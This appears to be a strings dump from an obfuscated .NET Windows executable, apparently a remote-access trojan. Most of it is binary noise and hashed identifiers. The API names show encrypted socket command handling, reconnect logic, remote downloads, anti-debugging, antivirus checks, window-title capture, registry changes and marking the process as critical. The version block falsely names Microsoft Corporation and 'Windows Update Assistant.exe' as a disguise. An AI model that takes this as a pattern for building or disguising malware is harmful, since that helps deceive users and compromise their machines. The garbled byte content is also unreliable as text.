!This program cannot be run in DOS mode.
e2}EPKJ
`.rsrc
`.reloc
N}I_>a
h;3z=!
(ol6m~
iTE{u$
(s_;4
H>u?"M}
8AcE"-
)h}?'T
\VVAkBO
gMnS5!B>b
G/OOyZ
oyb +r*
oS _Ni
xf!Z+|t0
PF?uCB
Ts =X t
XWd4S5
&">9&6
5\fln{J#
UW4:dB
-a.L)e
nJs$`nbE_
Ga[2,!
[9m38Gj-
E\em3c
&cvw5HK
lt;nY&
T/ELYRU
j6nz!P%\
]M>zI^
E'aCD%e
*2c/Ub!m
Fzo)1L
UKI046V
:n3KGw
G#Ds7/
}P!Oo8}
^/DAp+/
4$`$~L
@]VA9M
pyos@b(
ziOWGM
]`\z;t
!hDFVK
;F$[H2
Oe D9/
l SD!c4L
sv }y}.
qP5!$s
"\eNZb
Y~nR3)&
V7,jgE&
uz)X~1
JU=Ncd<
/a1DdSgB
c~~'R,
t:l:2]
9"^RPG$`eN
Nfj)!s
q.QuOo
IbllH Wb
}A Caab
xsG&-:N
Nv v@\$vE3
m&6*YB+~i_
FnAomf'S
+3q+ca"@
s/ZK%Nn
f.v8AoH
$WLvFY|
~>k)NU
njQ5g>
)/j~"^
~hSOkR
;g41`w
tW#IEv
N}. gW
|TWiQi
ZLCHH!
4Q6.
pL1 4D
3X`o1~UY1
2hh!:s
o`*64x
kz]bd<
-L#~cb
G> }#s9,[
C<\|_D
w`1B,t
Y#]5S:m7[x
S}[Kg9
A g(U+
o2%a5"
h4\5Q<
(>//+;
=S]tz:
/wx.Fp
0dwY|]ul/x
=c}YBK
`GbFGb
*t,Py{/5IR
rKz{I"
N2][>w
M_pN\F
5PmRbZ
.O:2A2
}os'^}\
4!)Zh%
#AP;|
K>gR!k
\:?!vL
l 9M;&0l
yww#yY
<Pb0?u
GEg_)Czi
c9tBFu
g{%_M3@
h.9,#g
8v3FIq[
^v'oGQlO
M]&FUV
sA7%jr
aGuBM(
;,rm1e
[2|}dB
;=e&ByqO.I
[LIL^*
:.7I6J
5e\$^54
?a,R7(
^ 8G:d
805%y'Z
g'4nPB
}4* ]j
I#lnJ~
'`kt/Q
&%Ky-B
(TV)"NT
]d8s4zY6
ySI++b1
Z MxS=a8
NtCoT
\Z pK5?a8
a_Z s7<
mZ $"4
Z Da*ka8
X l.dlT
rM+Z "1
TZ eDs
NtCoT
X ntinT
|iZ \K
%LZ 83
ntdlT
X l.dlT
aZ xR!7a8_
X ntinT
ntdlT
|[La88
\Qa7Z
3*vZ U
0Z [dd
(4CCZ
;~Z o
KaZ d*h
_CorExeMain
mscoree.dll
v4.0.30319
#Strings
#Strings
#Schema
lsdbvdsljh&&
Action`10
c9168ab0ff4d4a32512199703d1c7ab40
c1904a03bff1dd58de003c91ec9a535f0
c8bd4d0192cdb196fe42f2a6a0a155131
c3b82e212ebaf9c452c69253e8e8abc91
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
c2a62fae7cb514699dfcb3a5b5a5846a2
X509Certificate2
cf043643a4cef73f85c79e50240abf203
cec17e68646311a3956a498a1245fd913
c18e9eda292ac1d84f8557ec0880576b3
ToUInt64
ToInt64
c6f6434a099ce7268a6d5f1284ee1c384
c29dd3eccf24ea87e83dfdfc2a8c8c275
c95b908636f42dcf3114e7bbb2b578485
c8664b447363e49271f6fb899291b05a5
c2a1bb48bd19216a74a090442f59670d5
get_cd325c7fb4b73eb4f80a2a80ba5fa82f5
cc919e44762099e77d0bf8c3f40241916
ToUInt16
ToInt16
cec52858c88e26902279142b85198bd26
c37747ef289ab5d53dc4738398ea65b36
HMACSHA256
c1e88cf38b30a0e1bc0cfd6fcae1fea86
ca846976f35962a61d18e35db05c40196
ce271ca119019d3baa3a2e3281c62dfe6
cdacb29b007d4c708234179db4f92e187
c250bb0bff9f00d19357143c2bbdb12b7
cc1732fe9a8f32ddf3ff87c2945039838
cd4be08a3f2c65951a69966fa3188d348
get_UTF8
c725ebafb2abb97fd221ad673bec551a8
c6ca8644d57c087efc64f9a138d5d7fa8
c75daf4e3d8c6a7a10d760d44b642fdc8
ccd0fc7ae610448631defe15f72057be8
c185d3ee596f9bc6eb92e4ff2604bb729
c2d654fd2abcfa60ab8f057cc6ce48f29
c1b0905580eb714e42c5cd6e66fc6b659
c8ba047d6059ad36fd9a603921b452199
c7099d21ae5629f346ead38ec83d4c7b9
c936faa9ed84f9a25f7672ca551412bb9
c0b881f50203af8038868b1583b2406d9
<Module>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
A"FC?a85P44HzOk<3{vF5i)$E
GetHINSTANCE
bzBeekSudHpJYgdZvOrqHvOpAFoG
get_ASCII
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
c03dee2fd622db6a873e71af2b9a5d00a
c76be0644efa42ec7ce3a7dc60709bc0a
c8c28774407a9841102c80fe2cd08352a
cc93766af5ec4e50f7c56a7dead518d4a
cf6e95859f6aff8a1afe96687ee50325a
c1e61c2fef5da9a46f877a4e85047bbda
ReadServertData
c75bd21822764a81c6560e5447cbde5db
c0236030dc249c6c42dc35c18f0f14cfb
mscorlib
cad70a8afc8540e27d8687bdb4c032b6c
System.Collections.Generic
Microsoft.VisualBasic
c60d87eaf62957a9f5fd62ceee2195c2d
cfeedc2596cf7c2ee1acd67047450a7ad
EndRead
BeginRead
get_CurrentThread
SHA256Managed
get_IsAttached
get_Connected
ccba0ad06370a089d9e0f1eae5b14fdfd
get_Guid
Append
RegistryValueKind
set_IsBackground
GetMethod
c756132742ce35c348884480b53a3441e
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
get_Unicode
c29817c88c70fdc15b6ce680208c5f3ee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
SaveBytesToFile
IsInRole
WindowsBuiltInRole
GetActiveWindowTitle
get_Module
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FullyQualifiedName
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
ValueType
ProtocolType
GetType
SocketType
GetElementType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
SuppressIldasmAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ConfusedByAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_IsAlive
add_ResourceResolve
add_AssemblyResolve
Remove
lsdbvdsljh.exe
set_BlockSize
get_InputBlockSize
get_OutputBlockSize
get_TotalSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
c693a776e9ac3707604dd4ebef1846d5f
c4dea69a16da2dadfa07416e484b36e8f
IndexOf
cdee6fe0ff77c71a199f0cb04ea1f03bf
CryptoConfig
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
UTF8Encoding
System.Drawing.Imaging
IsLogging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
BytesAsString
GetAsString
GetString
BytesAsHexString
Substring
System.Drawing
set_ErrorDialog
lsdbvdsljh
ComputeHash
strToHash
GetHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
StartsWith
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
TransformFinalBlock
TransformBlock
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
kernel32.dll
user32.dll
ntdll.dll
GetManifestResourceStream
FileStream
DeflateStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Globalization
System.Reflection
X509CertificateCollection
ManagementObjectCollection
get_Position
set_Position
CryptographicException
ArgumentNullException
ArgumentException
Intern
Unknown
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
Microsoft.CSharp
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
DESCryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
Buffer
Integer
Debugger
ManagementObjectSearcher
ResolveEventHandler
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
NumberStyles
GetManifestResourceNames
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
ResolveEventArgs
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
Concat
ImageFormat
format
FindObject
ManagementBaseObject
ForcePathObject
Collect
Connect
Reconnect
VirtualProtect
System.Net
Target
Client.Handle_Packet
Socket
op_Explicit
ClientOnExit
IAsyncResult
ToUpperInvariant
WebClient
InitializeClient
AuthenticateAsClient
System.Management
Environment
get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
ToList
MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
CloseMutex
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
GetCallingAssembly
GetExecutingAssembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
set_Capacity
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
Confuser.Core 1.5.0+b5197549e4
WrapNonExceptionThrows
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
1.0.0.0
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Windows Update
FileVersion
1.0.0.0
InternalName
Windows Update Assistant.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
Windows Update Assistant.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0